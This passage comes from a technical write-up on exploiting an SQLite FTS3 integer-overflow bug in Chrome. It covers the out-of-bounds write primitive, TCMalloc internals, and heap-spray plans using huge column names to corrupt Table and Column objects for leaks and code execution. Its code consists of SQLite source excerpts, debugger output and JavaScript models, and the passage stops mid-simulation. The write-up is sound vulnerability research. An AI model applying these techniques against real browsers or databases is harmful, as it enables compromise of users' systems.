Everything is the same with Term 1. A 0x10 space is allocated and apple is stored. However, on the second iteration, nPrefix is read from the blob as 0x7FFFFFFF, and nSuffix as 1. On line 21, nPrefix + nSuffix is 0x80000000, which is negative as a signed 32-bit integer, thus bypassing the check, which operates on signed integers, and no allocation is performed. On line 34, the memcpy will operate with the destination being &pReader->zTerm[0x7FFFFFFF]. As a note, the example value of nPrefix is set to 0x7FFFFFFF instead of 0xFFFFFFFF because the function that actually reads the value, fts3GetVarint32, only reads up to a maximum value of 0x7FFFFFFF, and any value above that is truncated.

Let’s first assess the meaning of this on a 32-bit platform. pReader->zTerm points to the beginning of apple, so &pReader->zTerm[0x7FFFFFFF] will point to 2GB after apple, and memcpy will copy 1 byte of the suffix “a” to that location. This is effectively an OOB write to data that is placed 2GB after Term 1’s string. On a 32-bit platform, it is also possible for &pReader->zTerm[0x7FFFFFFF] to wrap around the address space and point to an address before apple. This could be used to our advantage, if it is possible to place interesting objects at the wrapped around address.

Now let’s see which elements of the OOB write are controllable. Since the attacker can freely modify the shadow table data, the entire content of the BLOB is controllable. This means that the string of Term 1 is controllable, and in turn, the allocation size of pReader->zTerm is controllable. The offset 0x7FFFFFFF of &pReader->zTerm[0x7FFFFFFF] is also controllable, provided that it is no greater than 0x7FFFFFFF. Next, since the Suffix Length of Term 2 is attacker controlled, the memcpy size is also controlled. Finally, the actual data that is copied from the source of the memcpy comes from pNext, which points to Term 2’s string data, so that is controlled too. This gives a restrictive but powerful OOB write primitive, where the destination chunk size, the memcpy source data content, and the memcpy size are completely attacker controlled. The only requirement is that the target to be corrupted has to be placed 2GB after the destination chunk, which is apple in the example.

The situation in a 64-bit environment is not very different from 32-bit. Everything is the same, except that &pReader->zTerm[0x7FFFFFFF] has no chance to wrap around the address space because the 64-bit address space is too big for that to happen. Also, on 32-bit, spraying the heap to cover the entire address space is a useful tool to aid exploitation, but doing so is impractical on 64-bit.
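
The difference between the two pointer widths can be checked with a few lines of arithmetic. The sketch below uses BigInt so that 64-bit addresses stay exact. The base addresses are made-up examples, and oobTarget is a hypothetical helper.

```javascript
// Computes the address of &zTerm[0x7FFFFFFF] for a given pointer width.
// `wrapped` is true when the result lands below the base address.
function oobTarget(base, pointerBits) {
    const mask = (1n << BigInt(pointerBits)) - 1n;
    const target = (base + 0x7fffffffn) & mask;
    return { target, wrapped: target < base };
}

const low32 = oobTarget(0x20000000n, 32);       // chunk in the lower half
const high32 = oobTarget(0x90000000n, 32);      // chunk in the upper half
const any64 = oobTarget(0x7f0000000000n, 64);   // typical-looking 64-bit heap address

console.log(low32.target.toString(16), low32.wrapped);    // 9fffffff false
console.log(high32.target.toString(16), high32.wrapped);  // fffffff true
console.log(any64.target.toString(16), any64.wrapped);    // 7f007fffffff false
```

On 32-bit, any base above 0x80000000 wraps, so the write lands before apple. On 64-bit the target is always 2GB ahead.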

Now let’s talk about the restriction of the bug. Because nPrefix + nSuffix has to be at least 0x80000000 (so that the signed sum is negative) in order to bypass the check on line 21, only certain nPrefix and nSuffix value pairs can be used to trigger the bug. For instance, a [0x7FFFFFFF, 1] pair is okay. [0x7FFFFFFE, 2], [0x7FFFFFFD, 3], [1, 0x7FFFFFFF], and [2, 0x7FFFFFFE] are also okay. But [0x7FFFFFF0, 1] is not okay: its sum stays positive, so it fails to bypass the check and falls into the if block. In that case, a very large allocation is attempted and the function will most likely return with SQLITE_NOMEM. Therefore, based on the values that are accepted by the bug, we can OOB write data in the following ranges.
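
To make the accepted pairs concrete, the following sketch classifies a few [nPrefix, nSuffix] pairs and reports which offsets, relative to pReader->zTerm, a triggering pair would overwrite. It is only a model of the check described above, with nTermAlloc fixed at the example value of 10, and classifyPair is a hypothetical name.

```javascript
// Model only: decides whether a pair bypasses the signed check and, if so,
// which byte offsets from zTerm the memcpy would cover (inclusive).
function classifyPair(nPrefix, nSuffix, nTermAlloc = 10) {
    const wrapped = (nPrefix + nSuffix) | 0;     // signed 32-bit sum
    if (wrapped > nTermAlloc) {
        return { triggers: false, reason: "falls into the if block" };
    }
    if (wrapped >= 0) {
        return { triggers: false, reason: "fits in the existing buffer" };
    }
    return {
        triggers: true,
        firstOffset: nPrefix,                    // memcpy destination offset
        lastOffset: nPrefix + nSuffix - 1,       // last byte written
    };
}

const pairs = [
    [0x7fffffff, 1],
    [0x7ffffffe, 2],
    [1, 0x7fffffff],
    [0x7ffffff0, 1],
];
for (const [nPrefix, nSuffix] of pairs) {
    const result = classifyPair(nPrefix, nSuffix);
    console.log(nPrefix.toString(16), nSuffix.toString(16), JSON.stringify(result));
}
```

Every pair that triggers the bug produces a range that contains offset 0x7FFFFFFF.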

Basically, the overwritten data must include the byte that is exactly 0x7FFFFFFF bytes away from the memcpy destination, and it could overwrite data either backwards or forward, with attacker controlled data of any size. This is the positional restriction of the bug. The OOB write cannot start at an arbitrary offset. After assessing the primitives given by the bug, we came to the conclusion that the bug could very well be exploitable on 64-bit platforms, provided that there is a good target for corruption, where the target object has certain tolerance for marginal errors. The next sections will describe the entire process of exploitation, including which targets were picked for corruption, and how they were abused for information leak and code execution.

Exploitation

Before diving in, it should be noted that the exploit was not designed to be 100% reliable. There are several sources of failure. Some of them were addressed, but the ones that were too time consuming to fix were left as is. The exploit was built as a means to show that the bug is exploitable on Desktop platforms, and as such, the focus was placed on pushing through to achieve code execution, not on maximizing reliability and speed. Nevertheless, we will discuss potential pitfalls and sources of failure at each stage of exploitation, and suggest possible solutions to address them.

The exploit is divided into 11 stages. The SQL queries cannot all be stuffed into one huge transaction, because certain queries had to be split in order to achieve reliable corruption. Furthermore, a lot of SQL queries depend on the results of previous queries, such as those in the infoleak phase, so the previous query results had to be parsed in JavaScript and passed on to the next batch of SQL queries. Each of the 11 stages will be described in detail, from the meaning of the cryptic queries to the actual goal that the stage is trying to achieve.

The TCMalloc allocator

Before even attempting to build an exploit, it is essential to understand the allocator in play. The application that links the sqlite library would most likely use the system allocator that lies underneath, but in the situation of Chrome, things are a little different. According to the heap design documents of Chrome, Chrome hooks all calls to malloc and related calls, and redirects them to other custom allocators. This is different for every operating system, so it is important to understand which allocator Chrome chooses to use instead of the system allocators. In the case of Linux, Chrome redirects every malloc operation to TCMalloc. TCMalloc is an allocator developed and maintained by Google, with certain security properties kept in mind during development, as well as being a fast and efficient allocator.

TCMalloc works much like allocators such as jemalloc or the LFH: it splits a few pages into equal-sized chunks and groups chunks of each size into separate freelists. The chunks are linked much like PTMalloc’s fastbins, in a singly-linked list, and the way a page is split into equal-sized chunks resembles jemalloc. However, unlike the LFH, no randomness is added to the freelists, which makes the job easier. There are 2 (more specifically, 3) size categories in TCMalloc. In Chrome, chunks smaller than 0x8000 are categorized as small chunks, and bigger ones are large chunks. The small chunks are further divided into 54 size classes (this value is specific to Chrome), and chunks are grouped and managed by their respective size class. The free chunks are linked in a singly-linked list as described above.

TCMalloc has a per-thread cache and a central page cache. Each thread has its own freelists to manage its pool of small chunks. If the freelist of a certain chunk size reaches a certain threshold (this threshold is dynamic and adapts to the heap usage), the per-thread cache can toss a chunk from that freelist to the central cache. Or, if the combined size of all free chunks across all size classes of the thread cache reaches a threshold (4MB on Chrome), the garbage collector kicks in, collects chunks from all freelists of the thread cache, and gives them to the central cache.

The central cache is the manager for all thread caches. It issues new freelists when a thread cache’s freelist is exhausted, and it collects chunks when a thread cache’s freelist grows too big. The central cache is also the manager for large chunks. All requests for sizes larger than 0x8000 are served by the central cache, which manages the freelist of large chunks with either a singly-linked list or a red-black tree.
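
The property that matters most for the rest of this post is that a thread cache freelist behaves like a stack with no randomization. The toy model below shows only that property. It is a deliberately simplified sketch with made-up addresses, and it ignores the central cache, thresholds, and garbage collection.

```javascript
// Toy model of a thread cache: one LIFO free list per size class.
// Real TCMalloc is far more involved; this only shows the reuse order.
class ToyThreadCache {
    constructor() {
        this.freeLists = new Map();   // size class -> stack of chunk addresses
        this.nextFresh = 0x1000;      // made-up address for fresh chunks
    }

    malloc(sizeClass) {
        const list = this.freeLists.get(sizeClass) || [];
        if (list.length > 0) return list.pop();   // take the head of the free list
        const addr = this.nextFresh;              // otherwise pretend the central
        this.nextFresh += sizeClass;              // cache handed out a new chunk
        return addr;
    }

    free(addr, sizeClass) {
        if (!this.freeLists.has(sizeClass)) this.freeLists.set(sizeClass, []);
        this.freeLists.get(sizeClass).push(addr); // freed chunk becomes the new head
    }
}

const cache = new ToyThreadCache();
const first = cache.malloc(0xa00);
const second = cache.malloc(0xa00);
cache.free(first, 0xa00);
console.log(cache.malloc(0x10) === first);   // false: other size classes are separate
console.log(cache.malloc(0xa00) === first);  // true: the last freed chunk comes back first
```

Because the most recently freed chunk of a size class is handed out next, a freed chunk can be refilled predictably as long as nothing else allocates from the same size class in between.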

All of this might seem too convoluted in text. Here are some illustrations borrowed from Sean Heelan’s excellent slides from 2011 InfiltrateCon.

An overview of the Thread Cache and the Central Page Cache

How the Central Cache conjures a new freelist

Singly-linked list of each size class of small chunks

The algorithm of tc_malloc(small_chunk_size)

Also, the following links are very helpful to get a general overview of how the TCMalloc allocator works.

Attacking the WebKit Heap
TCMalloc : Thread-Caching Malloc
How tcmalloc Works

And of course, the best reference is the source code itself.

Stage 1 and Stage 2

Now that the basics of the allocator have been covered, it’s time to find the right object to corrupt. One of the first targets that comes to mind is the JavaScript objects on the V8 heap. This was the first target that we went for, because corrupting the right JavaScript object would instantly yield relative R/W, which can further be upgraded to an AAR/AAW. However, due to the way PartitionAlloc requests pages from the underlying system allocator, it was practically impossible to have the V8 heap placed behind TCMalloc’s heap. Even if it could happen, the chances were near zero.

Therefore, we decided to go for objects that are bound to be on the same heap, that is, objects that are allocated by SQLite itself. As mentioned in the SQLite Architecture section, the actual data values of the tables are not good targets for manipulating the heap. The B-Tree that represents the data also lives in the Page Cache or in the database file on disk. Even if parts of the B-Tree are briefly constructed in memory upon a SELECT statement, they are purged as soon as the Bytecode engine is done executing the SELECT statement. If the table data values cannot be used, there would seem to be a very limited choice of objects that could influence the heap in a controlled fashion. However, there is one more object that could make a good candidate.

That is, Table and Column objects. It just so happens that SQLite keeps all Table and Column objects created by a CREATE statement in memory, and those objects persist until the database is closed completely. The decision behind this is presumably based on the assumption that Table and Column objects would not become bloated, or at least that such cases would be rare enough that the performance advantage of keeping those objects in memory outweighs their memory cost. This is true to some degree. However, it is possible to construct Column objects that eat a colossal amount of memory while persisting in memory. This can be observed in the Limits In SQLite webpage.

The maximum number of bytes in the text of an SQL statement is limited to SQLITE_MAX_SQL_LENGTH which defaults to 1000000. You can redefine this limit to be as large as the smaller of SQLITE_MAX_LENGTH and 1073741824.

One thing to notice is that SQLite does not have an explicit limit on the length of a column name or a table name. Both are governed only by the length limit of the SQL statement that contains those names, which is SQLITE_MAX_SQL_LENGTH. So as long as the length of the user query is lower than SQLITE_MAX_SQL_LENGTH, SQLite will happily accept column names of any size. Although SQLite itself defaults SQLITE_MAX_SQL_LENGTH to 1000000, Chrome redefines this value as 1000000000.

/*
** The maximum length of a single SQL statement in bytes.
**
** It used to be the case that setting this value to zero would
** turn the limit off.  That is no longer true.  It is not possible
** to turn this limit off.
*/
#ifndef SQLITE_MAX_SQL_LENGTH
# define SQLITE_MAX_SQL_LENGTH 1000000000
#endif

1000000000 is a very big value. It is almost 1GB. What this means is that theoretically, it is possible to create column names that are approximately 1GB, and make them persist in memory. Before discussing what we’re going to do with the Column values, let’s look at the structures of the objects involved in column name creation, and the code that handles them.

When a table is created by the CREATE statement, the tokenizer tokenizes the entire SQL query and passes the tokens to the parser. Under the hood, SQLite uses the Lemon Parser Generator. Lemon is similar to the more popular YACC or BISON parser generators, but has a different grammar syntax and is maintained by SQLite. The Lemon parser generator takes a context-free grammar written in Lemon syntax and generates an LALR parser in C code. In SQLite, the bulk of the generated C code can be found in the yy_reduce function. The grammar that Lemon parses is found in parse.y, and the code that is used for CREATE statements is found here. A snippet of the code is shown below.

///////////////////// The CREATE TABLE statement ////////////////////////////
//
cmd ::= create_table create_table_args.
create_table ::= createkw temp(T) TABLE ifnotexists(E) nm(Y) dbnm(Z). {
   sqlite3StartTable(pParse,&Y,&Z,T,0,0,E);
}
createkw(A) ::= CREATE(A).  {disableLookaside(pParse);}

%type ifnotexists {int}
ifnotexists(A) ::= .              {A = 0;}
ifnotexists(A) ::= IF NOT EXISTS. {A = 1;}
%type temp {int}
%ifndef SQLITE_OMIT_TEMPDB
temp(A) ::= TEMP.  {A = 1;}
%endif  SQLITE_OMIT_TEMPDB
temp(A) ::= .      {A = 0;}
create_table_args ::= LP columnlist conslist_opt(X) RP(E) table_options(F). {
  sqlite3EndTable(pParse,&X,&E,F,0);
}
create_table_args ::= AS select(S). {
  sqlite3EndTable(pParse,0,0,0,S);
  sqlite3SelectDelete(pParse->db, S);
}
%type table_options {int}
table_options(A) ::= .    {A = 0;}
table_options(A) ::= WITHOUT nm(X). {
  if( X.n==5 && sqlite3_strnicmp(X.z,"rowid",5)==0 ){
    A = TF_WithoutRowid | TF_NoVisibleRowid;
  }else{
    A = 0;
    sqlite3ErrorMsg(pParse, "unknown table option: %.*s", X.n, X.z);
  }
}
columnlist ::= columnlist COMMA columnname carglist.
columnlist ::= columnname carglist.
columnname(A) ::= nm(A) typetoken(Y). {sqlite3AddColumn(pParse,&A,&Y);}

The bulk of the Table creation logic is performed in the sqlite3StartTable function, and the Column handling logic is found in sqlite3AddColumn. Let’s visit the sqlite3StartTable function and take a brief look.

void sqlite3StartTable(
  Parse *pParse,   /* Parser context */
  Token *pName1,   /* First part of the name of the table or view */
  Token *pName2,   /* Second part of the name of the table or view */
  int isTemp,      /* True if this is a TEMP table */
  int isView,      /* True if this is a VIEW */
  int isVirtual,   /* True if this is a VIRTUAL table */
  int noErr        /* Do nothing if table already exists */
){
  Table *pTable;
  char *zName = 0; /* The name of the new table */
  sqlite3 *db = pParse->db;
  Vdbe *v;
  int iDb;         /* Database number to create the table in */
  Token *pName;    /* Unqualified name of the table to create */

  // snipped for brevity

  pTable = sqlite3DbMallocZero(db, sizeof(Table));
  if( pTable==0 ){
    assert( db->mallocFailed );
    pParse->rc = SQLITE_NOMEM_BKPT;
    pParse->nErr++;
    goto begin_table_error;
  }
  pTable->zName = zName;
  pTable->iPKey = -1;
  pTable->pSchema = db->aDb[iDb].pSchema;
  pTable->nTabRef = 1;

  // snipped for brevity

The most important object for our purposes is the Table object. This structure contains all the information about the table created by the CREATE statement, and its definition is as follows.

struct Table {
  char *zName;         /* Name of the table or view */
  Column *aCol;        /* Information about each column */
  Index *pIndex;       /* List of SQL indexes on this table. */
  Select *pSelect;     /* NULL for tables.  Points to definition if a view. */
  FKey *pFKey;         /* Linked list of all foreign keys in this table */
  char *zColAff;       /* String defining the affinity of each column */
  ExprList *pCheck;    /* All CHECK constraints */
                       /*   ... also used as column name list in a VIEW */
  int tnum;            /* Root BTree page for this table */
  u32 nTabRef;         /* Number of pointers to this Table */
  u32 tabFlags;        /* Mask of TF_* values */
  i16 iPKey;           /* If not negative, use aCol[iPKey] as the rowid */
  i16 nCol;            /* Number of columns in this table */
  LogEst nRowLogEst;   /* Estimated rows in table - from sqlite_stat1 table */
  LogEst szTabRow;     /* Estimated size of each table row in bytes */
  u8 keyConf;          /* What to do in case of uniqueness conflict on iPKey */
  int addColOffset;    /* Offset in CREATE TABLE stmt to add a new column */
  int nModuleArg;      /* Number of arguments to the module */
  char **azModuleArg;  /* 0: module 1: schema 2: vtab name 3...: args */
  VTable *pVTable;     /* List of VTable objects. */
  Trigger *pTrigger;   /* List of triggers stored in pSchema */
  Schema *pSchema;     /* Schema that contains this table */
  Table *pNextZombie;  /* Next on the Parse.pZombieTab list */
};

For our purposes, the most important fields are aCol and nCol. Next, we will look at the sqlite3AddColumn function.

void sqlite3AddColumn(Parse *pParse, Token *pName, Token *pType){
  Table *p;
  int i;
  char *z;
  char *zType;
  Column *pCol;
  sqlite3 *db = pParse->db;
  if( (p = pParse->pNewTable)==0 ) return;
  if( p->nCol+1>db->aLimit[SQLITE_LIMIT_COLUMN] ){
    sqlite3ErrorMsg(pParse, "too many columns on %s", p->zName);
    return;
  }
  z = sqlite3DbMallocRaw(db, pName->n + pType->n + 2);
  if( z==0 ) return;
  if( IN_RENAME_OBJECT ) sqlite3RenameTokenMap(pParse, (void*)z, pName);
  memcpy(z, pName->z, pName->n);
  z[pName->n] = 0;
  sqlite3Dequote(z);
  for(i=0; i<p->nCol; i++){
    if( sqlite3_stricmp(z, p->aCol[i].zName)==0 ){
      sqlite3ErrorMsg(pParse, "duplicate column name: %s", z);
      sqlite3DbFree(db, z);
      return;
    }
  }
  if( (p->nCol & 0x7)==0 ){
    Column *aNew;
    aNew = sqlite3DbRealloc(db,p->aCol,(p->nCol+8)*sizeof(p->aCol[0]));
    if( aNew==0 ){
      sqlite3DbFree(db, z);
      return;
    }
    p->aCol = aNew;
  }
  pCol = &p->aCol[p->nCol];
  memset(pCol, 0, sizeof(p->aCol[0]));
  pCol->zName = z;
  sqlite3ColumnPropertiesFromName(p, pCol);
 
  if( pType->n==0 ){
    /* If there is no type specified, columns have the default affinity
    ** 'BLOB' with a default size of 4 bytes. */
    pCol->affinity = SQLITE_AFF_BLOB;
    pCol->szEst = 1;
#ifdef SQLITE_ENABLE_SORTER_REFERENCES
    if( 4>=sqlite3GlobalConfig.szSorterRef ){
      pCol->colFlags |= COLFLAG_SORTERREF;
    }
#endif
  }else{
    zType = z + sqlite3Strlen30(z) + 1;
    memcpy(zType, pType->z, pType->n);
    zType[pType->n] = 0;
    sqlite3Dequote(zType);
    pCol->affinity = sqlite3AffinityType(zType, pCol);
    pCol->colFlags |= COLFLAG_HASTYPE;
  }
  p->nCol++;
  pParse->constraintName.n = 0;
}

The important parts of the logic are highlighted. Several things can be observed from this function. First, as mentioned above, there is no limit on the length of the column name. However, there is a limit on how many columns can exist in a single table, and that value is held in db->aLimit[SQLITE_LIMIT_COLUMN]. The value comes from a #define in the SQLite source code, and is set to 2000.

/*
 ** This is the maximum number of
 **
 **    * Columns in a table
 **    * Columns in an index
 **    * Columns in a view
 **    * Terms in the SET clause of an UPDATE statement
 **    * Terms in the result set of a SELECT statement
 **    * Terms in the GROUP BY or ORDER BY clauses of a SELECT statement.
 **    * Terms in the VALUES clause of an INSERT statement
 **
 ** The hard upper limit here is 32676.  Most database people will
 ** tell you that in a well-normalized database, you usually should
 ** not have more than a dozen or so columns in any table.  And if
 ** that is the case, there is no point in having more than a few
 ** dozen values in any of the other situations described above.
 */

 #ifndef SQLITE_MAX_COLUMN
 # define SQLITE_MAX_COLUMN 2000
 #endif

This is something to keep in mind for later. Also, column names cannot be duplicated. Next, the column properties are stored in an array of Column objects, which tableObject->aCol points to. This array is grown by 8 entries each time the column count reaches a multiple of 8, which can be seen in line 26. This function also sets various flags of the Column object. The definition of the Column structure is as follows.

/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/

struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence.  If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties.  See COLFLAG_ defines below */
};

The actual column name will be held in zName, and there are various other fields that describe the characteristics of a column.

One last thing that should be mentioned is that these functions are called in the parser phase of the SQLite execution pipeline. This means that the only heap noise present is the noise from the tokenizer phase. However, the tokenizer creates almost zero heap noise, and therefore the objects created on the heap, as well as the heap activity that occurs during a CREATE TABLE statement, are quite manageable.

The following is how an actual Table object and the accompanying Column array would look in memory.

sqlite> CREATE TABLE test(t1, t2, t3);

(gdb) p *(Table*)0x74ab38
$13 = {
  zName = 0x728cf8 "test",
  aCol = 0x74ac28,
  pIndex = 0x0,
  pSelect = 0x0,
  pFKey = 0x0,
  zColAff = 0x0,
  pCheck = 0x0,
  tnum = 2,
  nTabRef = 1,
  tabFlags = 0,
  iPKey = -1,
  nCol = 3,
  nRowLogEst = 200,
  szTabRow = 40,
  keyConf = 0 '\000',
  addColOffset = 28,
  nModuleArg = 0,
  azModuleArg = 0x0,
  pVTable = 0x0,
  pTrigger = 0x0,
  pSchema = 0x72aa38,
  pNextZombie = 0x0
}

(gdb) p *(Column*)0x74ac28@3
$15 = {{
    zName = 0x74b678 "t1",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }, {
    zName = 0x74b6c8 "t2",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }, {
    zName = 0x74abc8 "t3",
    pDflt = 0x0,
    zColl = 0x0,
    notNull = 0 '\000',
    affinity = 65 'A',
    szEst = 1 '\001',
    colFlags = 0 '\000'
  }}

The important thing to notice about these table objects is that they are used for every operation on the table, be it a SELECT, UPDATE, or INSERT statement. Every field in a user query that references something in a certain table is checked against this table object that resides in memory. From an exploitation point of view, this means that if it is possible to corrupt certain fields in these objects, we can make SQLite react in peculiar ways when certain SQL queries are issued. Take the column name above as an example. If we corrupt the name t1 and change it to t1337, and the attacker afterwards executes the SQL statement “SELECT t1 from test”, the SQLite engine will respond with “No such column as t1 exists”. This is because when the select statement is executed, the SQLite engine consults the above table, looks at the aCol field, and sequentially tests whether there is a column that matches the name t1. If it doesn’t find such a column, it returns an error.
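
The lookup behaviour described above can be modelled in a few lines. The sketch below is a simplification that represents a table as a plain object with the same field names as the gdb dump. findColumn is a hypothetical stand-in for the engine’s name resolution, not an SQLite function.

```javascript
// Model of the column lookup: a linear, case-insensitive scan over aCol.
function findColumn(table, name) {
    for (let i = 0; i < table.aCol.length; i++) {
        if (table.aCol[i].zName.toLowerCase() === name.toLowerCase()) {
            return i;
        }
    }
    return -1;   // the engine would report that the column does not exist
}

const test = {
    zName: "test",
    aCol: [{ zName: "t1" }, { zName: "t2" }, { zName: "t3" }],
};

console.log(findColumn(test, "t1"));   // 0
test.aCol[0].zName = "t1337";          // simulate the memory corruption
console.log(findColumn(test, "t1"));   // -1
console.log(findColumn(test, "t2"));   // 1
```

The failed lookup is the observable side effect: a query that used to succeed now returns an error, which tells the attacker that the corruption landed in that column name.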

Knowing this, and the other elements discussed above, a plan of attack emerges.

  1. Spray a whole bunch of Column arrays, enough to fill more than 2GB of memory.
  2. Place the vulnerable apple fts3 allocation in front of the spray.
  3. Trigger the vulnerability, and corrupt one of the column object’s zName field.
  4. Corrupt the field so that it points to an address that we want to leak.
  5. Afterwards, try to leak the value through SQL statements.

There are several caveats with this approach. The problems are not immediately clear until actually constructing the payload and viewing the results, so we will address them as they appear, one by one.

The first problem is that the maximum number of columns in SQLite is 2000. A single Column object’s size is 0x20, which means that the maximum size of a Column array is 0xFA00. In order to spray 2GB worth of memory, roughly 0x8000 tables with 2000 columns each have to be sprayed. 0x8000 doesn’t seem like a big number for SQLite to handle, but actually spraying that many column arrays takes 10 minutes from beginning to completion. This is a lot of time, and we wanted to reduce it to something more manageable.
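
The numbers above follow directly from the sizes involved. The short calculation below takes the 0x20 Column size and the 2000-column limit from the text and models the grow-by-8 behaviour of sqlite3AddColumn. The function name columnArrayBytes is made up for this sketch.

```javascript
const COLUMN_SIZE = 0x20;          // size of one Column object, from the text
const MAX_COLUMNS = 2000;          // SQLITE_MAX_COLUMN
const TARGET_BYTES = 0x80000000;   // 2GB of sprayed memory

// The Column array grows in steps of 8 entries, so its capacity is the
// column count rounded up to the next multiple of 8.
function columnArrayBytes(nCol) {
    const capacity = Math.ceil(nCol / 8) * 8;
    return capacity * COLUMN_SIZE;
}

const maxArrayBytes = columnArrayBytes(MAX_COLUMNS);
const tablesNeeded = Math.ceil(TARGET_BYTES / maxArrayBytes);

console.log(columnArrayBytes(3).toString(16));   // 100
console.log(maxArrayBytes.toString(16));         // fa00
console.log(tablesNeeded.toString(16));          // 8313
```

The exact count comes out slightly above 0x8000, which is why spraying Column arrays alone is so slow.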

To address this problem, we used a divide-and-conquer approach. How it works is as follows.

  1. Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
  2. Place the vulnerable apple fts3 allocation in front of the spray.
  3. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
  4. Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
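
The steps above can be simulated without SQLite. In the sketch below, each table is reduced to its single column name, the names are treated as one contiguous block for simplicity, and a 64-byte name stands in for the real 256MB one (8 × 256MB = 2GB). All function names are hypothetical.

```javascript
const TABLE_COUNT = 8;
const NAME_LENGTH = 64;   // stands in for the 256MB column name

// Step 1: "spray" eight tables, each holding one long column name.
function makeSpray() {
    const tables = [];
    for (let i = 0; i < TABLE_COUNT; i++) {
        tables.push({ name: `table${i}`, column: "A".repeat(NAME_LENGTH).split("") });
    }
    return tables;
}

// Step 3: overwrite payload.length bytes at a flat offset into the spray.
function oobWrite(tables, flatOffset, payload) {
    for (let i = 0; i < payload.length; i++) {
        const off = flatOffset + i;
        const table = tables[Math.floor(off / NAME_LENGTH)];
        table.column[off % NAME_LENGTH] = payload[i];
    }
}

// Step 4: "query" every table with its original column name and collect
// the ones where the name no longer matches.
function findCorrupted(tables) {
    const expected = "A".repeat(NAME_LENGTH);
    return tables
        .filter(t => t.column.join("") !== expected)
        .map(t => t.name);
}

const tables = makeSpray();
oobWrite(tables, 5 * NAME_LENGTH + 10, "BBBB");
console.log(findCorrupted(tables));   // [ 'table5' ]
```

Eight queries are enough to learn which 256MB region the write landed in, instead of probing tens of thousands of small tables.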

A picture is worth a thousand words. The entire process is illustrated below.

When testing this the first time on Chrome, we realized that it actually works. So we decided to build all kinds of different primitives based on this concept.

Another problem became immediately clear when executing this first experiment several times: the random location of apple. After the first successful corruption, on the next corruption the allocation of apple would jump to a completely different place from the previous allocation. This was strongly undesirable. In order to place an object of interest at the OOB write address, that location needs to stay fixed instead of jumping around, which would make it impossible to build other primitives on top of it. The reason apple kept moving was that it was allocated from the 0x10 size class’s freelist of the thread cache. It is highly likely that heap noise placing a lot of 0x10 chunks on the freelist was the source of uncertainty. In order to understand the actual source of the noise, let’s look at the stack trace at the time the bug triggers.

Breakpoint 2, fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
168731    if( !pReader->aDoclist ){
(gdb) bt
#0  fts3SegReaderNext (p=0x74b378, pReader=0x74b988, bIncr=0) at sqlite3.c:168731
#1  0x00000000004e414a in fts3SegReaderStart (p=0x74b378, pCsr=0x74dbf8, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170143
#2  0x00000000004e427a in sqlite3Fts3MsrIncrStart (p=0x74b378, pCsr=0x74dbf8, iCol=1, zTerm=0x751128 "sample", nTerm=6) at sqlite3.c:170183
#3  0x00000000004d7699 in fts3EvalPhraseStart (pCsr=0x753fe8, bOptOk=1, p=0x7510a8) at sqlite3.c:161648
#4  0x00000000004d8356 in fts3EvalStartReaders (pCsr=0x753fe8, pExpr=0x751068, pRc=0x7fffffffbe68) at sqlite3.c:162034
#5  0x00000000004d8c62 in fts3EvalStart (pCsr=0x753fe8) at sqlite3.c:162362
#6  0x00000000004d5ed1 in fts3FilterMethod (pCursor=0x753fe8, idxNum=3, idxStr=0x0, nVal=1, apVal=0x745540) at sqlite3.c:160604
#7  0x0000000000465aca in sqlite3VdbeExec (p=0x73f428) at sqlite3.c:89599
#8  0x000000000045a1cb in sqlite3Step (p=0x73f428) at sqlite3.c:81040

In line 11, it can be observed that the Virtual Table Method fts3FilterMethod is executed from the Virtual Database Engine. This means that the SELECT statement was tokenized and parsed, and that its bytecode was generated and executed. It is easy to imagine how many unwanted heap allocations occur throughout that entire phase of execution.

Generally, there are 2 ways to deal with heap noise.

  1. Precisely track every single heap allocation that occurs when the bug triggers, and make the exploit compatible with all the heap noise.
  2. Upgrade the heap objects that are used during exploitation to a size-class that is not busy, where almost no heap noise occurs in that size-class.

Method 1 is definitely possible, and has been successful in some past engagements. However, whenever method 2 is applicable, it is the preferable method and the one we always choose. To address the heap noise, we went with method 2, because the size of the apple allocation is completely attacker controlled.

Now it is time to refine the strategy.

  1. The size of apple should be upgraded to something bigger than 0x800. Let’s say, 0xa00.
  2. 0xa00 sized chunks will be sprayed. One of the 0xa00 chunks will be a placeholder to be used with the apple fts3 allocation.
  3. Create a table with a 256MB length column name. Create 8 tables of such kind. This will spray 2GB worth of data.
  4. Create a hole in the placeholder from step 2. This will place it on the top of the 0xa00 freelist.
  5. Allocate the 0xa00 sized apple fts3 allocation in the placeholder. Trigger the bug. The OOB write will overwrite exactly 4 bytes of the column name of one of the 8 tables.
  6. Plug in the placeholder hole with a new 0xa00 allocation, so it could be reused for corruption in a later phase.
  7. Query all 8 tables with “SELECT 256MB_really_long_column_name from tableN”. Exactly 1 table will return an error that no such column exists.
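
The hole, refill, and plug cycle of steps 4 to 6 can be simulated with a toy allocator. The sketch below assumes one LIFO freelist per size class with no interaction between classes, and it assumes that the apple buffer is released after the query finishes. The addresses and the amount of 0x10 noise are made up.

```javascript
// Toy per-size-class LIFO free lists (a simplification of the thread cache).
const freeLists = new Map();
let nextFresh = 0x100000;

function toyMalloc(size) {
    const list = freeLists.get(size);
    if (list && list.length > 0) return list.pop();
    const addr = nextFresh;
    nextFresh += size;
    return addr;
}

function toyFree(addr, size) {
    if (!freeLists.has(size)) freeLists.set(size, []);
    freeLists.get(size).push(addr);
}

// Step 2: spray 0xa00 chunks and pick one of them as the placeholder.
const sprayed = [];
for (let i = 0; i < 0x100; i++) sprayed.push(toyMalloc(0xa00));
let placeholder = sprayed[0x80];

const appleAddresses = new Set();
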